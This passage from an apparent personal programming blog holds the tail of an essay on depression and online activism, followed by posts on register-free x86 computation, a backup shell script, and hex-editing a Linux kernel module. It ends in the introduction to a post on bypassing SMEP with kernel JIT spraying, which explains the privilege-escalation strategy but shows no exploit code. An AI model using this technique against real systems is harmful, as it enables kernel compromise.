can't give myself permission to tune out, because the same people lecture constantly about my obligation to be a good ally, which mostly takes the form of “shut up and listen.” And then when I'm upset by the things they say, the response is “This isn't for you! Why are you listening?”</p><p>A local group, one that had recently invited me to hang out as a guest, retweeted a member's declaration to would-be allies: “We're not friends. 
Fuck you.” Can you see why it feels like they're trying to hurt me?</p><hr /><p>Let me be clear: I truly don't care if people in a room somewhere are talking about how men are the worst. I don't feel oppressed by it, and I have no desire to argue with it. But I can't handle direct exposure.</p><p>And don't tell me that I'm too stupid to understand why they say these things. I know intellectually that it's not about me. I understand the need to vent and the importance of building solidarity. None of that matters on the emotional level where these comments register like a punch to the gut. I <em>do</em> feel this way, even if I shouldn't and I wish I didn't.</p><p>I'm talking about mental health, triggers, and unintentionally hurtful speech. Does that sound familiar? One reason I was drawn to intersectional feminism is that it seemed to have a good set of ground rules for how to treat everyone decently. But now I feel like I'm excluded from protection. “Men are horrible” is apparently the one form of speech where intent is all that matters, and I'm a bad person if it triggers something. I've been told it's offensive that I would even try to describe my experience in those terms.</p><p>It hurts a whole lot to try and really feel someone's pain, and then realize they don't even <em>slightly</em> give a shit about me. It hurts even more when they'll bend over backwards for anyone <em>except</em> me.</p><p>Look, I get it. You argue all the time with trolls who claim that men have it just as bad as women and will shout “what about the men” as a way to disrupt any discussion. When you're engaged in meme warfare, you can't show them any human empathy. They certainly wouldn't return the favor. And if my voice sounds a little like theirs, that's just too bad for me.</p><p>I know that this article will serve as ammunition for some people with views I find disgusting. That sucks, but I'm done using political strategy as a reason to stay silent. 
I understand tone policing as a derailing tactic, and I understand the need to call it out. But at this point it seems there's no room for a sincere request for kindness, especially coming from someone who doesn't get much benefit of the doubt. (The Geek Feminism Wiki <a href="http://geekfeminism.wikia.com/wiki/Tone_argument?oldid=23472#Civility">basically says</a> that asking for kindness is tone policing if and only if you're a man.)</p><p>I'm not trying to silence anyone here. I'm not jumping in and derailing an existing conversation. I'm writing on my own blog, on my own schedule, about my own feelings. But I'm told that even this is crossing a line.</p><p>I know that I can't dictate how others feel about our fucked-up world. Does that mean I must absolutely suppress the way I feel? Even when we agree about the substance of what's wrong? I know that if I ask someone to share their life experiences, they have a right to express anger. When does expressing anger become sustained, deliberate cruelty?</p><p>“People are being oppressed and you're asking us to care about your feelings?” Yes, I am asking you to care. Just a little bit. I don't claim that my feelings should be a top priority. I hope it wouldn't come up very often. But according to the outspoken few who <a href="http://www.smbc-comics.com/?id=2939">set the tone</a>, I'm <em>never</em> allowed to bring it up. I don't deserve to ask them to be nice.</p><p>And that's why I can no longer have anything to do with this movement. It's really that simple. I guess it says something about my state of mind that I felt the need to attach 1,700 words of preemptive defenses.</p><hr /><p>The truth is, when I'm not allowed to say or even think “not all men,” part of me hears “Yes, all men, especially you.” And if I'm ever confused about whether I'm allowed to say “not all men,” there are a dozen unprompted reminders every day. 
Little jokes, repeated constantly to set the climate about what will and won't be tolerated.</p><p>When you treat me like one of the trolls, I start to believe that I am one. Guys who say “I support feminism but sometimes they go too far” are usually trying to excuse sexist behavior. So what do I conclude about myself when I have the same thought?</p><p>I get that “ally” is not a label you self-apply, it's a thing you do, and the label comes from others. The problem is, if a hundred people say I'm a good ally, and one person says I'm a sexist asshole, who do you think I'm going to believe?</p><p>I'm not allowed to stand up for myself, because doing so is automatically an act of oppression. If a woman treats me like shit, and she's being “more feminist” than me, I conclude that I deserve to be treated like shit. That is the model I've learned of a good ally.</p><p>I'm not a good ally, or even a bad one. I'm collateral damage.</p><p>If the point of all this is to give me a tiny little taste of the invalidation that others experience on a regular basis, then congratulations, it worked. You've made your point. Now that you've broken me, how can I possibly help you, when it seems like I'm part of the problem just by existing? It feels like all I can do is engage in emotional self-harm to repay the debt of how I was born.</p><p>I can't just take a break “until I feel better.” My depressive symptoms will always come and go, and some thoughts will reliably bring them back. I spent years reading about how the most important thing I can do, as a winner of the birth lottery, is to be an ally to marginalized people. And now I've realized that I'm too sick and weak to do it.</p><p>Even if I give up on being an ally, I can't avoid this subject. It affects a lot of my friends, and I feel even worse when I ask them not to talk about it around me. I don't want to silence anyone. 
At least I've mostly stopped using Twitter.</p><p>So this is how I feel, but I'm not sure anyone else can do anything about it. Really, most of the people I've talked to have been sympathetic. Maybe I need to learn not to let bullies get to me, even when they're bullying in service of a cause I support. They don't seem to get much pushback from the wider community, at any rate.</p><p>What gives me hope is that I recognize my participation in the endless shouting online wasn't really useful to anyone. If I can let myself ignore all that, maybe I can recover some of my energy for other activities that actually help people.</p><p>That's all I have to say right now. Thank you for listening to me.</p><p><a href="http://mainisusuallyafunction.blogspot.com/2014/06/on-depression-privilege-and-online.html">Permalink</a> · keegan</p><hr /><p><strong>x86 is Turing-complete with no registers</strong> (Wed, 12 Feb 2014)</p><p><em>In which x86 has too many registers after all.</em></p><h1 id="introduction">Introduction</h1><p>The fiendish complexity of the x86 instruction set means that even bizarrely restricted subsets are capable of arbitrary computation. As others have shown, we can compute using <a href="http://www.phrack.org/issues.html?issue=57&amp;id=15#article">alphanumeric machine code</a> or <a href="http://www.cs.jhu.edu/~sam/ccs243-mason.pdf">English sentences</a>, using <a href="http://www.cl.cam.ac.uk/~sd601/papers/mov.pdf">only the <code>mov</code> instruction</a>, or <a href="https://github.com/jbangert/trapcc">using the MMU</a> as it handles a never-ending double-fault. Here is my contribution to this genre of <a href="http://esolangs.org/wiki/Turing_tarpit">Turing tarpit</a>: x86 is <a href="http://esolangs.org/wiki/Turing-complete">Turing-complete</a> with no registers.</p><h1 id="no-registers">No registers?</h1><p>What do I mean by &quot;no registers&quot;? 
Well, really just whatever makes the puzzle interesting, but the basic guideline is:</p><blockquote><p>No instruction's observable behavior can depend on the contents of any ordinary user-space register.</p></blockquote><p>So we can't read from <code>R[ABCD]X</code>, <code>R[SD]I</code>, <code>R[SB]P</code> (that's right, no stack), <code>R8</code>-<code>R15</code>, any of their smaller sub-registers, or any of the x87 / MMX / SSE registers. This forbids implicit register access like <code>push</code> or <code>movsb</code> as well as explicit operands. I think I would allow <code>RIP</code>-relative addressing, but it's probably not useful when you're building a single executable which loads at a fixed address.</p><p>We also can't use the condition flags in <code>EFLAGS</code>, so conditional jumps and moves are right out. Many instructions will set these flags, but those dead stores are okay by me.</p><p>All memory access depends on segment selectors, the page table base in <code>CR3</code>, and so on. We trust that the OS (Linux in my example) has set up a reasonable flat memory model, and we shouldn't try to modify that. Likewise there are debug registers, parts of <code>EFLAGS</code> (such as the trap bit), and numerous <a href="http://wiki.osdev.org/Model_Specific_Registers">MSRs</a> which can influence the execution of nearly any instruction. We ignore all that too. Basically, the parts of CPU state which normal user-space code doesn't touch are treated as constants.</p><p>So what's left that we can work with? Just</p><ul class="incremental"><li>the instruction pointer,</li><li>memory operands, and</li><li>self-modifying code.</li></ul><p>But it would be too easy to self-modify an instruction into having a register operand. The above restrictions must hold for every instruction we execute, not just those appearing in our binary. 
Later on I'll demonstrate experimentally that we aren't cheating.</p><h1 id="the-instruction-set">The instruction set</h1><p>In a RISC architecture, every memory access is a register load or store, and our task would be completely impossible. But x86 does not have this property. For example we can store a constant directly into memory. Here's machine code along with NASM (Intel syntax) assembly:</p><pre><code>c6042500004000ba mov byte [0x400000], 0xba<br />66c7042500004000dbba mov word [0x400000], 0xbadb<br />c7042500004000efbead0b mov dword [0x400000], 0xbadbeef<br />48c7042500004000efbead0b mov qword [0x400000], 0xbadbeef</code></pre><p>In the latter case the 4-byte constant is <a href="http://en.wikipedia.org/wiki/Sign_extension">sign-extended</a> to 8 bytes.</p><p>We can also perform arithmetic on a memory location in place:</p><pre><code>8304250000400010 add dword [0x400000], 0x10</code></pre><p>But moving data around is going to be hard. As far as I know, every instruction which loads from one address and stores to another, for example <code>movsb</code>, depends on registers in some way.</p><p>Conditional control flow is possible thanks to this gem of an instruction:</p><pre><code>ff242500004000 jmp qword [0x400000]</code></pre><p>This jumps to whatever address is stored as a 64-bit quantity at address 0x400000. This seems weird but it's really just a load where the destination register is the instruction pointer. Many RISC architectures also allow this.</p><h1 id="compiling-from-brainfuck">Compiling from Brainfuck</h1><p>Let's get more concrete and talk about compiling <a href="http://esolangs.org/wiki/Brainfuck">Brainfuck</a> code to this subset of x86. Brainfuck isn't the simplest language out there (try <a href="http://esolangs.org/wiki/Subleq">Subleq</a>) but it's pretty familiar as an imperative, structured-control language. 
So I think compiling from Brainfuck makes this feel &quot;more real&quot; than compiling from something super weird.</p><p>A Brainfuck program executes on a linear tape of (<a href="http://esolangs.org/wiki/Brainfuck#Memory_and_wrapping">typically</a>) byte-size cells.</p><pre><code>TAPE_SIZE equ 30000<br /><br />tape_start:<br /> times TAPE_SIZE dq cell0<br /><br />head equ tape_start + 8 * (TAPE_SIZE / 2)</code></pre><p>Like many Brainfuck implementations, the tape has a fixed size (more on this later) and we start in the middle. Each tape entry is a qword, hence the factor of 8. <code>head</code> is not a variable with a memory location; it's just an assembler constant for the address of the middle of the tape.</p><p>Since our only way to read memory is <code>jmp [addr]</code>, the tape must store pointers to code. We create 256 short routines, each representing one of the values a cell can hold.</p><pre><code>cont_zero: dq 0<br />cont_nonzero: dq 0<br />out_byte: db 0<br /><br />align 16<br />cell_underflow:<br /> jmp inc_cell<br /><br />align 16<br />cell0:<br /> mov byte [out_byte], 0<br /> jmp [cont_zero]<br /><br />%assign cellval 1<br />%rep 255<br /> align 16<br /> mov byte [out_byte], cellval<br /> jmp [cont_nonzero]<br /> %assign cellval cellval+1<br />%endrep<br /><br />align 16<br />cell_overflow:<br /> jmp dec_cell</code></pre><p>There are two things we need to do with a cell: get its byte value for output, and test whether it's zero. So each routine moves a byte into <code>out_byte</code> and jumps to the address stored at either <code>cont_zero</code> or <code>cont_nonzero</code>.</p><p>We produce most of the routines using a <a href="http://www.nasm.us/doc/nasmdoc4.html">NASM macro</a>. We also have functions to handle underflow and overflow, so a cell which would reach -1 or 256 is bumped back to 0 or 255. 
(We could implement the more typical wrap-around behavior with somewhat more code.)</p><p>The routines are aligned on 16-byte boundaries so that we can implement Brainfuck's <code>+</code> and <code>-</code> by adding or subtracting 16. But how do we know where the head is? We can't store it in a simple memory variable because we'd need a double-indirect jump instruction. This is where the self-modifying code comes in.</p><pre><code>test_cell:<br /> jmp [head]<br /><br />inc_cell:<br /> add qword [head], 16<br /> jmp test_cell<br /><br />dec_cell:<br /> sub qword [head], 16<br /> jmp test_cell<br /><br />move_right:<br /> add dword [inc_cell+4], 8<br /> add dword [dec_cell+4], 8<br /> add dword [test_cell+3], 8<br /> jmp [cont_zero]<br /><br />move_left:<br /> sub dword [inc_cell+4], 8<br /> sub dword [dec_cell+4], 8<br /> sub dword [test_cell+3], 8<br /> jmp [cont_zero]</code></pre><p>Recall that <code>head</code> is an assembler constant for the middle of the tape. So <code>inc_cell</code> etc. will only touch the exact middle of the tape — except that we modify the instructions when we move left or right. The address operand starts at byte 3 or 4 of the instruction (check the disassembly!) and we change it by 8, the size of a function pointer.</p><p>Also note that <code>inc_cell</code> and <code>dec_cell</code> jump to <code>test_cell</code> in order to handle overflow / underflow. By contrast the move instructions don't test the current cell and just jump to <code>[cont_zero]</code> unconditionally.</p><p>To output a byte we <a href="https://github.com/kmcallister/rip/blob/4595341f8635c184f620a01a944a84c700e3641d/rip.asm#L7-L14">perform</a> the system call <a href="http://man7.org/linux/man-pages/man2/write.2.html"><code>write</code></a><code>(1, &amp;out_byte, 1)</code>. 
There's no escaping the fact that the <a href="http://stackoverflow.com/questions/2535989/what-are-the-calling-conventions-for-unix-linux-system-calls-on-x86-64">Linux system call ABI</a> uses registers, so I allow them here. We can do arbitrary computation without output; it's just nice if we can see the results. Input is <a href="https://github.com/kmcallister/rip/blob/4595341f8635c184f620a01a944a84c700e3641d/rip.asm#L73-L88">messier still</a> but it's not fundamentally different from what we've seen here. Code that self-modifies by calling <a href="http://man7.org/linux/man-pages/man2/read.2.html"><code>read</code></a><code>()</code> is clearly the future of computing.</p><p>Putting it all together, I wrote a small <a href="https://github.com/kmcallister/rip/blob/4595341f8635c184f620a01a944a84c700e3641d/compiler">Brainfuck compiler</a> which does little more than match brackets. For each Brainfuck instruction it outputs one line of assembly, a call to a <a href="https://github.com/kmcallister/rip/blob/4595341f8635c184f620a01a944a84c700e3641d/rip.asm#L91-L135">NASM macro</a> which will load <code>cont_[non]zero</code> and jump to one of <code>test_cell</code>, <code>inc_cell</code>, etc. 
For the program <code>[+]</code> the compiler's output looks like</p><pre><code>k00000000: do_branch k00000003, k00000001<br />k00000001: do_inc k00000002<br />k00000002: do_branch k00000003, k00000001<br />k00000003: jmp exit</code></pre><p>which blows up into something like</p><pre><code>401205: 48c70425611240005c124000 mov qword ptr [0x401261], 0x40125c<br />401211: 48c704256912400022124000 mov qword ptr [0x401269], 0x401222<br />40121d: e90cefffff jmp 40012e &lt;test_cell&gt;<br /><br />401222: 48c70425611240003f124000 mov qword ptr [0x401261], 0x40123f<br />40122e: 48c70425691240003f124000 mov qword ptr [0x401269], 0x40123f<br />40123a: e9f6eeffff jmp 400135 &lt;inc_cell&gt;<br /><br />40123f: 48c70425611240005c124000 mov qword ptr [0x401261], 0x40125c<br />40124b: 48c704256912400022124000 mov qword ptr [0x401269], 0x401222<br />401257: e9d2eeffff jmp 40012e &lt;test_cell&gt;<br /><br />40125c: e9c1eeffff jmp 400122 &lt;exit&gt;</code></pre><p>Even within our constraints, this code could be a lot more compact. For example, a <code>test</code> could be merged with a preceding <code>inc</code> or <code>dec</code>.</p><h1 id="demos">Demos</h1><p>Let's try it out on some of Daniel B Cristofani's <a href="http://www.hevanet.com/cristofd/brainfuck/">Brainfuck examples</a>.</p><pre><code>$ curl -s http://www.hevanet.com/cristofd/brainfuck/rot13.b | ./compiler<br />$ echo &#39;Uryyb, jbeyq!&#39; | ./rip<br />Hello, world!<br /><br />$ curl -s http://www.hevanet.com/cristofd/brainfuck/fib.b | ./compiler<br />$ ./rip<br />0<br />1<br />1<br />2<br />3<br />5<br />8<br />13<br />…</code></pre><p>And now let's try a Brainfuck interpreter written in Brainfuck. 
There are <a href="http://esolangs.org/wiki/Brainfuck#Self-interpreters">several</a>, but we will choose the <a href="http://homepages.xnet.co.nz/~clive/eigenratios/cgbfi2.b">fastest one</a> (by Clive Gifford), which is also compatible with our handling of end-of-file and cell overflow.</p><pre><code>$ curl -s http://homepages.xnet.co.nz/~clive/eigenratios/cgbfi2.b | ./compiler<br />$ (curl -s http://www.hevanet.com/cristofd/brainfuck/rot13.b;<br /> echo &#39;!Uryyb, jbeyq!&#39;) | ./rip<br />Hello, world!</code></pre><p>This takes about 4.5 seconds on my machine.</p><h1 id="verifying-it-with-ptrace">Verifying it with <code>ptrace</code></h1><p>How can we verify that a program doesn't use registers? There's no CPU flag to disable registers, but setting them to zero after each instruction is close enough. Linux's <a href="http://man7.org/linux/man-pages/man2/ptrace.2.html"><code>ptrace</code></a> system call allows us to manipulate the state of a target process.</p><pre class="sourceCode c"><code class="sourceCode c"><span class="dt">uint64_t</span> regs_boundary;<br /><br /><span class="dt">void</span> clobber_regs(pid_t child) {<br /> <span class="kw">struct</span> user_regs_struct regs_int;<br /> <span class="kw">struct</span> user_fpregs_struct regs_fp;<br /><br /> CHECK(ptrace(PTRACE_GETREGS, child, <span class="dv">0</span>, &amp;regs_int));<br /> <span class="kw">if</span> (regs_int.rip &lt; regs_boundary)<br /> <span class="kw">return</span>;<br /><br /> CHECK(ptrace(PTRACE_GETFPREGS, child, <span class="dv">0</span>, &amp;regs_fp));<br /><br /> <span class="co">// Clear everything before the instruction pointer,</span><br /> <span class="co">// plus the stack pointer and some bits of EFLAGS.</span><br /> memset(&amp;regs_int, <span class="dv">0</span>, offsetof(<span class="kw">struct</span> user_regs_struct, rip));<br /> regs_int.rsp = <span class="dv">0</span>;<br /> regs_int.eflags &amp;= EFLAGS_MASK;<br /><br /> <span class="co">// Clear x87 and SSE 
registers.</span><br /> memset(regs_fp.st_space, <span class="dv">0</span>, <span class="kw">sizeof</span>(regs_fp.st_space));<br /> memset(regs_fp.xmm_space, <span class="dv">0</span>, <span class="kw">sizeof</span>(regs_fp.xmm_space));<br /><br /> CHECK(ptrace(PTRACE_SETREGS, child, <span class="dv">0</span>, &amp;regs_int));<br /> CHECK(ptrace(PTRACE_SETFPREGS, child, <span class="dv">0</span>, &amp;regs_fp));<br /><br /> clobber_count++;<br />}</code></pre><p>For the layout of <code>struct user_regs_struct</code>, see <a href="https://sourceware.org/git/?p=glibc.git;a=blob;f=sysdeps/unix/sysv/linux/x86/sys/user.h;h=02d3db78891a409c79571343cd732a9cdcdc868a;hb=eefa3be8e4c2c721a9f277d8ea2e11180231829f#l42"><code>/usr/include/sys/user.h</code></a>.</p><p>We allow registers in the first part of the program, which is responsible for system calls. <code>regs_boundary</code> is set by <a href="https://github.com/kmcallister/rip/blob/4595341f8635c184f620a01a944a84c700e3641d/regclobber.c#L42-L58">looking</a> for the symbol <code>FORBID_REGS</code> in the binary.</p><p>We run the target using <code>PTRACE_SINGLESTEP</code>, which sets the <a href="http://en.wikipedia.org/wiki/Trap_flag">trap flag</a> so that the CPU will raise a <a href="http://wiki.osdev.org/Exceptions#Debug">debug exception</a> after one instruction. 
Linux handles this exception, suspends the traced process, and wakes up the tracer, which was blocked on <a href="http://man7.org/linux/man-pages/man2/waitpid.2.html"><code>waitpid</code></a>.</p><pre class="sourceCode c"><code class="sourceCode c"><span class="kw">while</span> (<span class="dv">1</span>) {<br /> <span class="co">// For this demo it&#39;s simpler if we don&#39;t deliver signals to</span><br /> <span class="co">// the child, so the last argument to ptrace() is zero.</span><br /> CHECK(ptrace(PTRACE_SINGLESTEP, child, <span class="dv">0</span>, <span class="dv">0</span>));<br /> CHECK(waitpid(child, &amp;status, <span class="dv">0</span>));<br /><br /> <span class="kw">if</span> (WIFEXITED(status))<br /> finish(WEXITSTATUS(status));<br /><br /> inst_count++;<br /> clobber_regs(child);<br />}</code></pre><p>And the demo:</p><pre><code>$ gcc -O2 -Wall -o regclobber regclobber.c<br />$ curl -s http://www.hevanet.com/cristofd/brainfuck/rot13.b | ./compiler<br />$ echo &#39;Uryyb, jbeyq!&#39; | time ./regclobber ./rip<br />Hello, world!<br /><br />Executed 81366 instructions; clobbered registers 81189 times.<br />0.36user 1.81system 0:01.96elapsed 110%CPU (0avgtext+0avgdata 1392maxresident)k</code></pre><p>At almost two seconds elapsed, this is hundreds of times slower than running <code>./rip</code> directly. Most of the time is spent in the kernel, handling all those system calls and debug exceptions.</p><p>I <a href="http://mainisusuallyafunction.blogspot.com/2011/01/implementing-breakpoints-on-x86-linux.html">wrote about <code>ptrace</code> before</a> if you'd like to see more of the things it can do.</p><h1 id="notes-on-universality">Notes on universality</h1><p>Our tape has a fixed size of 30,000 cells, the same as Urban Müller's original Brainfuck compiler. A system with a finite amount of state can't really be Turing-complete. But x86 itself also has a limit on addressable memory. 
So does C, because <span style="white-space:nowrap;"><code>sizeof(void *)</code></span> is finite. These systems <em>are</em> Turing-complete when you add an external tape using I/O, but so is a <a href="http://en.wikipedia.org/wiki/Finite-state_machine">finite-state machine</a>!</p><p>So while x86 isn't really Turing-complete, with or without registers, I think the above construction &quot;feels like&quot; arbitrary computation enough to meet the informal definition of &quot;Turing-complete&quot; commonly used by programmers, for example in the <a href="http://www.cl.cam.ac.uk/~sd601/papers/mov.pdf"><em><code>mov</code> is Turing-complete</em></a> paper. If you know of a way to formalize this idea, do let me know (I'm more likely to notice tweets <a href="https://twitter.com/miuaf"><code>@miuaf</code></a> than comments here).</p><p><a href="http://mainisusuallyafunction.blogspot.com/2014/02/x86-is-turing-complete-with-no-registers.html">Permalink</a> · keegan · 3 comments</p><hr /><p><strong>A shell recipe for backups with logs and history</strong> (Mon, 31 Dec 2012) · tags: code, git, imadethis, shell</p><p>I wrote a shell script for a <a href="http://en.wikipedia.org/wiki/Cron">cron</a> job that grabs backups of some remote files. It has a few nice features:</p><ul class="incremental"><li>Output from the backup commands is logged, with timestamps.</li><li><code>cron</code> will send me email if one of the commands fails.</li><li>The history of each backup is saved in Git. 
Nothing sucks more than corrupting an important file and then syncing that corruption to your one and only backup.</li></ul><p>Here's how it works.</p><pre class="sourceCode bash"><code class="sourceCode bash"><span class="co">#!/bin/bash -e</span><br /><br /><span class="kw">cd</span> /home/keegan/backups<br /><span class="ot">log=</span><span class="st">&quot;</span><span class="ot">$(</span><span class="kw">pwd</span><span class="ot">)</span><span class="st">&quot;</span>/log<br /><br /><span class="kw">exec</span> <span class="kw">3&gt;&amp;2</span> <span class="kw">&gt;</span> <span class="kw">&gt;(</span>ts <span class="kw">&gt;&gt;</span> <span class="st">&quot;</span><span class="ot">$log</span><span class="st">&quot;</span><span class="kw">)</span> <span class="kw">2&gt;&amp;1</span></code></pre><p>You may have seen <code>exec</code> used to <a href="http://en.wikipedia.org/wiki/Tail_call">tail-call</a> a command, but here we use it differently. When no command is given, <code>exec</code> <a href="http://tldp.org/LDP/abs/html/x17891.html">applies</a> file redirections to the current shell process.</p><p>We apply timestamps by redirecting output through <code>ts</code> (from <a href="http://joeyh.name/code/moreutils/">moreutils</a>), and append that to the log file. I would write <span class="nowrap"><code>exec | ts &gt;&gt; $log</code></span>, except that pipe syntax is not supported with <code>exec</code>.</p><p>Instead we use <a href="http://tldp.org/LDP/abs/html/process-sub.html">process substitution</a>. <code>&gt;(cmd)</code> expands to the name of a file, whose contents will be sent to the specified command. This file name is a fine target for normal file output redirection with <code>&gt;</code>. (It might name a temporary file created by the shell, or a special file under <code>/dev/fd/</code>.)</p><p>We also redirect standard error to the same place with <code>2&gt;&amp;1</code>. 
But first we open the original standard error as file descriptor 3, using <code>3&gt;&amp;2</code>.</p><pre class="sourceCode bash"><code class="sourceCode bash"><span class="kw">function</span><span class="fu"> handle_error</span> <span class="kw">{</span><br /> <span class="kw">echo</span> <span class="st">&#39;Error occurred while running backup&#39;</span> <span class="kw">&gt;&amp;3</span><br /> <span class="kw">tail</span> <span class="st">&quot;</span><span class="ot">$log</span><span class="st">&quot;</span> <span class="kw">&gt;&amp;3</span><br /> <span class="kw">exit</span> 1<br /><span class="kw">}</span><br /><span class="kw">trap</span> handle_error ERR</code></pre><p>Since we specified <code>bash -e</code> in the first line of the script, Bash will exit as soon as any command fails. We use <code>trap</code> to register a function that gets called if this happens. The function writes some of the log file to the script's original standard output. <code>cron</code> will capture that and send mail to the system administrator.</p><p>Now we come to the actual backup commands.</p><pre class="sourceCode bash"><code class="sourceCode bash"><span class="kw">cd</span> foo<br />git pull<br /><br /><span class="kw">cd</span> ../bar<br />rsync -v otherhost:bar/baz .<br />git commit --allow-empty -a -m <span class="st">&#39;[AUTO] backup&#39;</span><br />git repack -da</code></pre><p><code>foo</code> is a backup of a Git repo, so we just update a clone of that repo. If you want to be absolutely sure to preserve all commits, you can configure the backup repo to <a href="http://www.kernel.org/pub/software/scm/git/docs/git-gc.html">disable automatic garbage collection</a> and <a href="http://stackoverflow.com/questions/199728/setting-gc-reflogexpire">keep infinite reflog</a>.</p><p><code>bar</code> is a local-only Git repo storing history of a file synced from another machine. 
Semantically, Git stores each version of a file as a separate <a href="http://git-scm.com/book/en/Git-Internals-Git-Objects">blob</a> object. If the files you're backing up are reasonably large, this can waste a lot of space quickly. But Git supports &quot;packed&quot; storage, where the objects in a repo are compressed together. By <a href="http://www.kernel.org/pub/software/scm/git/docs/git-repack.html">repacking</a> the repo after every commit, we can save a ton of space.</p><p><a href="http://mainisusuallyafunction.blogspot.com/2012/12/a-shell-recipe-for-backups-with-logs.html">Permalink</a> · keegan · 3 comments</p><hr /><p><strong>Hex-editing Linux kernel modules to support new hardware</strong> (Tue, 18 Dec 2012) · tags: code, kernel</p><p>This is <a href="http://sourceforge.net/apps/mediawiki/mbm/index.php?title=Hex-editing_cdc_ether">an old trick</a> but a fun one. The <a href="http://en.wikipedia.org/wiki/ThinkPad_X1_Carbon">ThinkPad X1 Carbon</a> has no built-in Ethernet port. Instead it comes with a USB to Ethernet adapter. The adapter uses the <a href="http://www.asix.com.tw/products.php?op=pItemdetail&amp;PItemID=86;71;101">ASIX AX88772</a> chip, which Linux has supported since <a href="https://github.com/torvalds/linux/commit/1da177e4c3f41524e886b7f1b8a0c1fc7321cac2">time immemorial</a>. But support for the particular adapter shipped by Lenovo was only added in Linux 3.7.</p><p>This was a problem for me, since I wanted to use a Debian installer with a 3.2 kernel. I could set up a build environment for that particular kernel and recompile the module. 
But this seemed like an annoying yak to shave when I just wanted to get the machine working.</p><p><a href="https://github.com/torvalds/linux/commit/66dc81ecd71332783c92fb170950d5ddb43da461">The patch</a> to support the Lenovo adapter just adds a new USB device ID to an existing driver:</p><pre><code> }, {<br /><span style="color: green; font-weight: bold;">+ // Lenovo U2L100P 10/100<br />+ USB_DEVICE (0x17ef, 0x7203),<br />+ .driver_info = (unsigned long) &amp;ax88772_info,<br />+}, {</span><br /> // ASIX AX88772B 10/100<br /> USB_DEVICE (0x0b95, 0x772b),<br /> .driver_info = (unsigned long) &amp;ax88772_info,</code></pre><p>As a quick-and-dirty solution, we can edit the compiled kernel module <code>asix.ko</code>, changing that existing device ID <code>(0x0b95, 0x772b)</code> to the Lenovo one <code>(0x17ef, 0x7203)</code>. Since x86 CPUs are <a href="http://en.wikipedia.org/wiki/Endianness">little-endian</a>, this involves changing the bytes</p><pre><code>95 0b 2b 77</code></pre><p>to</p><pre><code>ef 17 03 72</code></pre><p>I wanted to do this within the Debian installer without rebooting. <a href="http://www.busybox.net/">Busybox</a> <code>sed</code> does not support hex escapes, but <code>printf</code> does:</p><pre><code>sed $(printf &#39;s/\x95\x0b\x2b\x77/\xef\x17\x03\x72/&#39;) \<br /> /lib/modules/$(uname -r)/kernel/drivers/net/usb/asix.ko \<br /> &gt; /tmp/asix.ko</code></pre><p>(It's worth checking that none of those bytes have untoward meanings as ASCII characters in a regular expression. As it happens, <code>sed</code> does not recognize <code>+</code> (aka <code>\x2b</code>) as repetition unless preceded by a backslash.)</p><p>Then I loaded the patched module along with its dependencies. A simple way is</p><pre><code>modprobe asix<br />rmmod asix<br />insmod /tmp/asix.ko</code></pre><p>And that was enough for me to complete the install over Ethernet. 
Of course, once everything is set up, it would be better to compile a properly-patched kernel using <a href="http://www.debian.org/releases/wheezy/amd64/ch08s06.html.en"><code>make-kpkg</code></a>. I haven't got around to it yet because wireless is working great. :)</p><p><a href="http://mainisusuallyafunction.blogspot.com/2012/12/hex-editing-linux-kernel-modules-to.html">Permalink</a> · keegan · 3 comments</p><hr /><p><strong>Attacking hardened Linux systems with kernel JIT spraying</strong> (Sun, 18 Nov 2012) · tags: c, code, imadethis, kernel, security</p><p>Intel's new Ivy Bridge CPUs support a security feature called <a href="http://www.anandtech.com/show/4830/intels-ivy-bridge-architecture-exposed/2">Supervisor Mode Execution Protection</a> (SMEP). It's supposed to thwart privilege escalation attacks, by preventing the kernel from executing a payload provided by userspace. In reality, there are <a href="http://vulnfactory.org/blog/2011/06/05/smep-what-is-it-and-how-to-beat-it-on-linux/">many ways</a> to bypass SMEP.</p><p>This article demonstrates one particularly fun approach. Since the Linux kernel <a href="https://lwn.net/Articles/437981">implements</a> a just-in-time compiler for Berkeley Packet Filter programs, we can use a JIT spraying attack to build our attack payload within the kernel's memory. Along the way, we will use another fun trick to create thousands of sockets even if <code>RLIMIT_NOFILE</code> is set as low as 11.</p><p>If you have some idea what I'm talking about, feel free to skip the next few sections and get to the gritty details. Otherwise, I hope to provide enough background that anyone with some systems programming experience can follow along. The code is <a href="https://github.com/kmcallister/alameda">available on GitHub</a> too.</p><p>Note to script kiddies: This code won't get you root on any real system. 
It's not an exploit against current Linux; it's a demonstration of how such an exploit could be modified to bypass SMEP protections.</p><h1 id="kernel-exploitation-and-smep">Kernel exploitation and SMEP</h1><p>The basis of kernel security is the CPU's distinction between user and kernel mode. Code running in user mode cannot manipulate kernel memory. This allows the kernel to store things (like the user ID of the current process) without fear of tampering by userspace code.</p><p>In a typical kernel exploit, we trick the kernel into jumping to our payload code while the CPU is still in kernel mode. Then we can mess with kernel data structures and gain privileges. The payload can be an ordinary function in the exploit program's memory. After all, the CPU in kernel mode is allowed to execute user memory: it's allowed to do anything!</p><p>But what if it wasn't? When SMEP is enabled, the CPU will block any attempt to execute user memory while in kernel mode. (Of course, the kernel still has ultimate authority and can disable SMEP if it wants to. The goal is to prevent <em>unintended</em> execution of userspace code, as in a kernel exploit.)</p><p>So even if we find a bug which lets us hijack kernel control flow, we can only direct it towards legitimate kernel code. This is a lot like exploiting a userspace program with <a href="http://en.wikipedia.org/wiki/NX_bit">no-execute</a> data, and the same techniques apply.</p><p>If you haven't seen some kernel exploits before, you might want to check out the <a href="http://mainisusuallyafunction.blogspot.com/2012/01/writing-kernel-exploits.html">talk</a> I gave, or the many references linked from those slides.</p><h1 id="jit-spraying">JIT spraying</h1><p><a href="http://www.semantiscope.com/research/BHDC2010/BHDC-2010-Paper.pdf">JIT spraying</a> [PDF] is a viable tactic when we (the attacker) control the input to a <a href="http://en.wikipedia.org/wiki/Just-in-time_compilation">just-in-time compiler</a>. 
